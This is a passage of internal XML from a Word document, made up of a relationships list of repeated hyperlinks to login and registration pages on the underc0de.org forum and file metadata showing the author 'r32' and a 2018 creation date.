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En este tutorial les enseñare como crear un simple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rasonware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utilizando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algotirmo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AES de 256 bytes, nos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permitira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archivos de texto,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imagenes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musica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Bueno y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como me gusta todo este mundo quise hacerme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mio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pero no para hacer daño, quise hacerme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mio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demostrar de lo que podemos ser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victimas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o que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tambien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nos puede servir de </w:t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ayuda(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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despues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les explicare esta parte)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Antes que nada quiero decirles que este tutorial va dirigido a personas con conocimientos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basicos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en java y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Android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Comenzamos, primero abrimos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Android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Studio y creamos un nuevo proyecto, creamos un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EmptyActivity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con su respectiva clase, algo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debe quedar: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857875" cy="2857500"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="1" name="Imagen 1" descr="http://i65.tinypic.com/qpf7g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65.tinypic.com/qpf7gx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DEF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Primero organizare la parte visual, voy a crear un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EditText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dos Botones, uno para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otro para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algo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quedaria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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00602901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&lt;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TextView</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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id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"@+id/textView4"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layout_width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match_parent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layout_height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wrap_content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           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layout_gravity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"center_vertical|center_horizontal|center"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fontFamily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monospace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text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"Contraseña"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textSize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"18sp"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/&gt;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&lt;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EditText</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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id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"@+id/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clavesita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layout_width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match_parent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layout_height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wrap_content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ems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"10"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inputType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textPassword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/&gt;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7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id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"@+id/boton1"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layout_width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match_parent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lastRenderedPageBreak/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layout_height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wrap_content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text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Encriptar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/&gt;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8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id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"@+id/boton2"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layout_width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match_parent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layout_height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wrap_content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</w:p>
    <w:p w:rsidR="00602901" w:rsidRPr="00602901" w:rsidRDefault="00602901" w:rsidP="00602901">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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text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Desencriptar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/&gt;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algo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veria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343525" cy="2857500"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="3" name="Imagen 3" descr="http://i66.tinypic.com/dtt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66.tinypic.com/dtt1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Listo y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aca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empezamos con lo interesante,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codigo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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!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presten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atencion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 cada detalle que nombro, muchas 'cositas' me quitaron horas y horas,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cuidado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Primero hay que pedir permisos, ya que tengo un celular con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Marshmallow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(6), tengo que pedir los permisos tanto en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Manifest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como en tiempo de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ejecucion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nos vamos a la carpeta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manifest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doble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click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al archivo AndroidManifest.xml y colocamos esto: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2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uses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-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permission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name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android.permission.READ_EXTERNAL_STORAGE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/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00602901" w:rsidRPr="00602901" w:rsidRDefault="00602901" w:rsidP="00602901">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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uses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-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permission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android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name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android.permission.WRITE_EXTERNAL_STORAGE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/&gt;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ahora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vamos a la clase que creamos junto con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EmptyActivity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se llama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MainActivity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pedire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los permisos en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ejecucion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//Verificamos si ya tiene permisos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if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ContextCompat.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checkSelfPermission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10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permission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READ_EXTERNAL_STORAGE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PackageManager.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PERMISSION_GRANTED</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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lastRenderedPageBreak/>
        <w:t xml:space="preserve">               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&amp;&amp;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ContextCompat.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checkSelfPermission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gramEnd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11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permission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WRITE_EXTERNAL_STORAGE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PackageManager.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PERMISSION_GRANTED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makeText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"La app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ya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tiene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permisos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LENGTH_SHORT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show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//Ya tenemos los permisos necesarios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//Podemos proceder a trabajar con la memoria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de el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celular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else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//Si no tenemos permisos, creare una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funcion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para pedirlos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PedirPermisos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3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fuera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metodo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OnCreate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definimos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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00602901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public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void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PedirPermisos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if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ActivityCompat.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shouldShowRequestPermissionRationale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12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permission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READ_EXTERNAL_STORAGE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makeText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"Se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necesitan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permisos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LENGTH_SHORT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show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spellStart"/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ActivityCompat.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requestPermissions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gramEnd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You are not allowed to view links. </w:t>
      </w:r>
      <w:hyperlink r:id="rId13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14" w:history="1">
        <w:proofErr w:type="gramStart"/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  <w:proofErr w:type="gramEnd"/>
      </w:hyperlink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[]{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15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permission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READ_EXTERNAL_STORAGE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16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permission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WRITE_EXTERNAL_STORAGE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               MY_PERMISSIONS_REQUEST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4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Para saber la respuesta </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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 el</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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usuario vamos a crear nuestra propia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version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onRequestPermissionsResult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es la que nos dice si el usuario nos dio los permisos o no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@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Override</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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public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void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onRequestPermissionsResult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int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requestCode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,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                   You are not allowed to view links. </w:t>
      </w:r>
      <w:hyperlink r:id="rId17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permissions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int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grantResults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lastRenderedPageBreak/>
        <w:t xml:space="preserve">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if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requestCode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MY_PERMISSIONS_REQUEST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val="en-US" w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>// If request is cancelled, the result arrays are empty.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if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grantResults.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length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&gt;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eastAsia="es-ES"/>
        </w:rPr>
        <w:t>0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&amp;&amp;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grantResults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[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val="en-US" w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>0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PackageManager.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PERMISSION_GRANTED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&amp;&amp;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grantResults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[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val="en-US" w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>1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PackageManager.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PERMISSION_GRANTED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makeText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"La app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ya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tiene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permisos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LENGTH_SHORT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show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else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makeText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this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"SIN PERMISOS NO SE PUEDE EJECUTAR LA APP"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LENGTH_SHORT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show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return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5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Algo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les debe estar quedando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5743575" cy="2857500"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="5" name="Imagen 5" descr="http://i63.tinypic.com/15mg0h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63.tinypic.com/15mg0hl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Luego voy a crear mi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 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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(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), la cual necesita una clave de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parametro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es la clave con la que vamos a cifrar los archivos, tiene que ser una clave de 16 bytes de tamaño, obligatoriamente!, yo utilizare esta = tr3D0ctaOlajESzU y una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direccion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esta es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ubicacion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 el archivo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public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void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encriptar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19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20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clave,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21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22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direccion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23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24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nombre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throws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25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26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27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28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NoSuchPaddingException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29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//Archivo de entrada(sin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encriptar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)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30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31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extStore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32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getExternalStorageDirectory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You are not allowed to view links. </w:t>
      </w:r>
      <w:hyperlink r:id="rId33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34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Entrada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35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"/"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direccion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     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      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//Archivo de salida(encriptado) su nombre cambia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quedaria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guardado algo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asi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= encript_foto.jpg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36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37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Salida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38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extStore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"/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encript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_"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nombre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 Tamaño de la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key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16 bytes!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SecretKeySpec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sks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SecretKeySpec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clave.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getBytes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"AES"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  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 Se crea el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Cipher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, el encargado de cifrar los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streams</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Cipher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getInstance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"AES"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init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ENCRYPT_MODE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sks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stream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de salida, archivo de salida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CipherOutputStream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cos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CipherOutputStream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Salida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, cipher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     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 Escribe bytes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int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b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byte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byte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eastAsia="es-ES"/>
        </w:rPr>
        <w:t>8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]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while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b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Entrada.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read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d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!=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-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val="en-US" w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>1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write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d, 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eastAsia="es-ES"/>
        </w:rPr>
        <w:t>0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 b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//Cierra los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stream</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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flush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close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Entrada.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close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//Borra el archivo original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You are not allowed to view links. </w:t>
      </w:r>
      <w:hyperlink r:id="rId39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40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tmp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41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"/"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direccion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tmp.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delete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6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nuestra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() , no la comentare porque hace casi lo mismo que la anterior</w:t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lastRenderedPageBreak/>
        <w:t>public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static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void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desencriptar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42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43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clave,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44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45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direccion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46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47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nombre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throws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48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49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50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51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NoSuchPaddingException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52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You are not allowed to view links. </w:t>
      </w:r>
      <w:hyperlink r:id="rId53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54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extStore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55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getExternalStorageDirectory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You are not allowed to view links. </w:t>
      </w:r>
      <w:hyperlink r:id="rId56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57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Entrada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58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"/"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direccion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You are not allowed to view links. </w:t>
      </w:r>
      <w:hyperlink r:id="rId59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60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Salida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61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extStore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"/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decrypt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_"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nombre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SecretKeySpec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sks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SecretKeySpec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clave.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getBytes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,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"AES"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Cipher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getInstance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"AES"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init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DECRYPT_MODE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sks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CipherInputStream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CipherInputStream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Entrada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, cipher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int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b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byte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d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byte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eastAsia="es-ES"/>
        </w:rPr>
        <w:t>8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]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while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b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cis.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read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d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!=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-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val="en-US" w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>1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Salida.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write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d, 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eastAsia="es-ES"/>
        </w:rPr>
        <w:t>0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, b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Salida.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flush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Salida.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close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cis.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close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//Borra el archivo encriptado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You are not allowed to view links.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"https://underc0de.org/foro/index.php?action=register"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Register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62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tmp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63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eastAsia="es-ES"/>
        </w:rPr>
        <w:t>"/"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+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direccion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tmp.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delete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7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Listo ya tenemos nuestras funciones encargadas de cifrar los archivos, ahora necesitamos una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valla por todas las carpetas del sistema buscando los archivos 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quedaria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algo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public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static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ArrayList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File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&gt;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EncontrarArchivos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64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root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ArrayList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File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&gt;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ArrayList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File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&gt;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You are not allowed to view links.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"https://underc0de.org/foro/index.php?action=register"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proofErr w:type="spellStart"/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Register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_archivos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root.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listFiles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if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_archivos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!=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eastAsia="es-ES"/>
        </w:rPr>
        <w:t>null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for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65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lista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_archivos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if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isDirectory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&amp;&amp;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!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isHidden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addAll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EncontrarArchivos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lista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else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> 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                    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//Solo permitimos archivos que terminen </w:t>
      </w:r>
      <w:proofErr w:type="gram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en .</w:t>
      </w:r>
      <w:proofErr w:type="gram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txt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.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jpg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.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jpeg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y .mp3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if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endsWith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".txt"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endsWith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".jpg"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endsWith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".jpeg"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endsWith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".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png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endsWith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".mp3"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if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lista.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getTotalSpace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&gt;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eastAsia="es-ES"/>
        </w:rPr>
        <w:t>3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//Si termina en lo que queremos y pesa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mas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de 3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kb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lo agregamos a la lista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                           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add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lista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return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Archivos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8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Bueno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basicamente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ya tenemos nuestras principales funciones ya listas, ahora programaremos que al hacer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click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sobre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boton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ejecute nuestra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con los archivos que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encontro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en el sistema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Como ya lo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habia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dicho antes,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despues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 que comprobamos los permisos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esque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podemos realizar las tareas, vamos a utilizar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codigo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anterior donde verificamos los permisos y habilitamos un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OnClickListener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cada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boton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creamos,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este al ser oprimido ejecutara lo que le digamos,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quedaria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algo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//PIDE Y COMPRUEBA PERMISOS EN EJECUCION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if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ContextCompat.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checkSelfPermission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66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permission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READ_EXTERNAL_STORAGE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PackageManager.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PERMISSION_GRANTED</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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&amp;&amp;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ContextCompat.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checkSelfPermission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gramEnd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You are not allowed to view links. </w:t>
      </w:r>
      <w:hyperlink r:id="rId67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permission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WRITE_EXTERNAL_STORAGE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PackageManager.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PERMISSION_GRANTED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//Referencia botones y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demas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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final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You are not allowed to view links.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"https://underc0de.org/foro/index.php?action=register"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Register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68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BotonEncriptar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69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findViewById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boton1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final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You are not allowed to view links.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"https://underc0de.org/foro/index.php?action=register"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Register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70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BotonDesencriptar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71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findViewById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boton2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final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EditText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EntradaClave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EditText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findViewById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clavesita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makeText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this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"La app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ya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tiene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permisos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Toast.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LENGTH_SHORT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show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lastRenderedPageBreak/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BotonDesencriptar.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setOnClickListener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gramEnd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You are not allowed to view links. </w:t>
      </w:r>
      <w:hyperlink r:id="rId72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OnClickListener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b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@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url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https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//underc0de.org/foro/index.php?action=profile;u=8340]Override[/url][/b]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public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void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onClick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73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view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try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//Lista de archivos encontrados en el sistema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final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ArrayList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File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&gt;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EncontrarArchivos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74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getExternalStorageDirectory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for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int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val="en-US" w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>0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size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++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                            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//los mandamos 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desenciptar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1 x 1,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pasandole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el nombre del archivo y su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ubicacion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, pero primero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                            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 revisamos si esta encriptado, (que en su nombre tenga la palabra "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encript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_"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                            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int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comprobacion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indexOf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"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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encript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00602901">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>_"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   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if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comprobacion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!=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-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eastAsia="es-ES"/>
        </w:rPr>
        <w:t>1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desencriptar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clave,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getPath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      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//Excepciones necesarias para la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funcion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de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encriptar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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}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catch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75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76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77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78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NoSuchPaddingException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79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k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k.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printStackTrace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proofErr w:type="spellStart"/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BotonEncriptar.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setOnClickListener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gramEnd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new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You are not allowed to view links. </w:t>
      </w:r>
      <w:hyperlink r:id="rId80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OnClickListener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lastRenderedPageBreak/>
        <w:t xml:space="preserve">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b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]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@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[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url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https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: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//underc0de.org/foro/index.php?action=profile;u=8340]Override[/url][/b]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public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void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onClick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81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view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try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</w:t>
      </w:r>
      <w:proofErr w:type="gram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final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ArrayList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File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&gt;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EncontrarArchivos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82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getExternalStorageDirectory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for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66"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>int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CC66CC"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>0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&lt;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size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++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  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    </w:t>
      </w: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//los mandamos a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encriptar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1 x 1,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pasandole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> el nombre del archivo y su </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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ubicacion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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encriptar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clave,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getPath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,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Archivos.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i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val="en-US" w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>getName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())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    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}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catch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83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84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85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Register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86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NoSuchPaddingException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|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gram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You</w:t>
      </w:r>
      <w:proofErr w:type="gram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are not allowed to view links. </w:t>
      </w:r>
      <w:hyperlink r:id="rId87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k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k.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printStackTrace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else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{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PedirPermisos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9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}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nos aseguramos a que sin los permisos necesarios nunca intentara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los archivos y que nos genere errores, listo nuestro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rasonware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esta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casi terminado, solo tenemos que leer la clave que nos ingresen para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con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EditText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se la pedimos al usuario y la leemos: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10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i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>//Referenciamos nuestro objetos en pantalla</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00602901" w:rsidRPr="00602901" w:rsidRDefault="00602901" w:rsidP="00602901">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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</w:p>
    <w:p w:rsidR="00602901" w:rsidRPr="00602901" w:rsidRDefault="00602901" w:rsidP="00602901">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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lastRenderedPageBreak/>
        <w:t> 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final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You are not allowed to view links.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"https://underc0de.org/foro/index.php?action=register"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Register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88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BotonEncriptar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89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findViewById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boton1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10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val="en-US" w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>final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You are not allowed to view links.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"https://underc0de.org/foro/index.php?action=register"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val="en-US" w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>Register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 or </w:t>
      </w:r>
      <w:hyperlink r:id="rId90" w:history="1">
        <w:r w:rsidRPr="00602901">
          <w:rPr>
            <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:color w:val="475965"/>
            <w:sz w:val="20"/>
            <w:lang w:val="en-US" w:eastAsia="es-ES"/>
          </w:rPr>
          <w:t>Login</w:t>
        </w:r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>BotonDesencriptar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val="en-US"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val="en-US"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hyperlink r:id="rId91" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00602901">
          <w:rPr>
            <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:color w:val="475965"/>
            <w:sz w:val="20"/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:t>Register</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink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findViewById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boton2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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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            </w:t>
      </w:r>
      <w:r w:rsidRPr="00602901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es-ES"/>
        </w:rPr>
        <w:t>final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EditText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EntradaClave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EditText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findViewById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R.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id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clavesita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luego la leemos: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</w:pPr>
      <w:r w:rsidRPr="00602901">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>Código: Java</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00602901" w:rsidRPr="00602901" w:rsidRDefault="00602901" w:rsidP="00602901">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="6" w:space="4" w:color="1B2426"/>
          <w:bottom w:val="single" w:sz="6" w:space="0" w:color="EFEFEF"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="288" w:lineRule="atLeast"/>
        <w:textAlignment w:val="top"/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</w:pP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t xml:space="preserve">You are not allowed to view links. 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val="en-US" w:eastAsia="es-ES"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://underc0de.org/foro/index.php?action=register"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proofErr w:type="spellStart"/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Register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or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 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begin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instrText xml:space="preserve"> HYPERLINK "https://underc0de.org/foro/index.php?action=login" </w:instrTex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separate"/>
      </w:r>
      <w:r w:rsidRPr="00602901">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="475965"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>Login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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fldChar w:fldCharType="end"/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clave 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=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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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EntradaClave.</w:t>
      </w:r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getText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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00602901">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="006633"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>toString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00602901">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="009900"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00602901">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="339933"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>;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esto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va dentro de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OnClickListener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de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boton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que al momento de que lo presionen la lea y haga sus respectivas tareas, Listo muchachos!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se hace un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rasonware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android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Ahora construyamos nuestra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apk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vamos a instalarla en nuestro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movil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aca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unas fotos de su funcionamiento, voy a crear una carpeta llamada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docs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dentro de ella guardare </w:t>
      </w:r>
      <w:proofErr w:type="gram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una</w:t>
      </w:r>
      <w:proofErr w:type="gram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archivo de texto, una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cancion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una imagen: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1714500" cy="2857500"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="7" name="Imagen 7" descr="http://i65.tinypic.com/2d9759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65.tinypic.com/2d9759v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01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Ahora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ire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aplicacion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le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dare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sobre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boton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, veamos que pasa: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se han encriptado los archivos de mi memoria, al tratar de abrir la imagen no me deja:</w:t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Ahora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ire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aplicacion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le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dare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sobre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boton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, veamos que pasa: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se han encriptado los archivos de mi memoria, al tratar de abrir la imagen no me deja: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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3514725" cy="2857500"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="9" name="Imagen 9" descr="http://i68.tinypic.com/2h7q73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68.tinypic.com/2h7q73n.pn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Ahora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volvere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aplicacion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le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dare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en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desenciptar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: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es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3514725" cy="2857500"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="10" name="Imagen 10" descr="http://i63.tinypic.com/2h875g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63.tinypic.com/2h875gl.png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01" w:rsidRPr="00602901" w:rsidRDefault="00602901" w:rsidP="006029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Mis archivos vuelven a la normalidad, puedo ver mi imagen,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fijensen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en los nombres, quiere decir que paso por todos nuestros procesos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Ahora podemos crear otra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funcion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al terminar de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los archivos no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envie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la clave y el id del celular a nuestro servidor para que quede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alli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guardada, no quise meter eso en el tutorial ya que pienso que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quizas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utilizen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para mal, de ese modo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podrian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pedir dinero para darles las clave y .....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Pero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aca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otra parte, porque no utilizamos esto de una buena forma? si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encriptamos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nuestros archivos con una clave que solo nosotros sepamos y los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desencriptamos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solo cuando los necesitemos? no puedo decir que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tendrias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100% de privacidad pero si le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dificultaria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el trabajo a cualquier cracker que quiera robarle su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informacion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.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cuidado con esto, no es algo para jugar y si van a hacer pruebas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haganlo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en ambientes controlados, mientras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hacia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esto me toco formatear mi celular ya que todos mis archivos quedaron encriptados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xd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asi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que cuidado, los archivos que lee son de la memoria interna del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telefono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no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se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porque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pasa esto pero solo me reconoce los de la memoria interna,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tambien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cuando le opriman sobre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esperar unos segundos hasta que el celular este normal, si minimizamos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aplicacion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o la cerramos de una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podria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generar errores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Les dejare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aplicacion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codigo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espero les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halla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gustado, yo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aprendi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bastante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haciendolo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espero ustedes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tambien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Aca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el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codigo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app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lista para que la prueben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You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are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not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allowed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to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view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links. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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"https://underc0de.org/foro/index.php?action=register" </w:instrText>
      </w:r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602901">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="475965"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>Register</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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begin"/>
      </w:r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instrText xml:space="preserve"> HYPERLINK "https://underc0de.org/foro/index.php?action=login" </w:instrText>
      </w:r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separate"/>
      </w:r>
      <w:r w:rsidRPr="00602901">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="475965"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>Login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00602901">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"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lastRenderedPageBreak/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No se preocupen si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descargnn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app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 su celular, no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hara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nada hasta que no opriman los botones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y luego con el de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desencriptar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todo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volvera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 la normalidad, es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mas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bien como educativo, no corran.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Ayer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murio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el vocalista de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Linkin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Park, Chester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Bennington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sus canciones me acompañaron mientras programaba y en mi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dia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, quise hacer este tutorial en homenaje a  él, Grande Chester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Bennington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!!, tus fans nunca te olvidaremos. </w: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</w:p>
    <w:p w:rsidR="00602901" w:rsidRPr="00602901" w:rsidRDefault="00602901" w:rsidP="006029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val="en-US" w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>You are not allowed to view links. </w:t>
      </w:r>
      <w:hyperlink r:id="rId95" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00602901">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="475965"/>
            <w:sz w:val="21"/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:t>Register</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink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or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fldChar w:fldCharType="begin"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instrText xml:space="preserve"> HYPERLINK "https://underc0de.org/foro/index.php?action=login" </w:instrText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fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00602901">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="475965"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>Login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fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00602901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lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r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(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perdon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por la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>ortografia</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0060290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  <w:t xml:space="preserve"> no soy muy bueno con las palabras)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00602901" w:rsidRPr="00602901" w:rsidRDefault="00602901" w:rsidP="00602901">
      <w:pP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es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00602901" w:rsidRPr="00602901" w:rsidSect="006029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DEB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="87B4A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A5831"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="152A6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36FA3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="12B6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E3324"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="76FC4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8A27D3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2AB2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620AEA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D50A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CD7A40"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6CCC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073BE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="233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BA1ABC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="757A5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E21655"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EA96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CC7239"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7CB46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02901"/>
    <w:rsid w:val="00602901"/>
    <w:rsid w:val="00B456FC"/>
    <w:rsid w:val="00D3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D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90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60290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02901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263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777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3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011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5429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6935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8456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0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4971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461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03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534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20929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2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5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4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2760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5239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7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0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74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5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1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1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0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1342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163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4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53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7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256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33799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9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5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5160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75297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4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83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4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3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0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8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6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1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1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27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4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3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6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1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7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8199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40085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761">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="15"/>
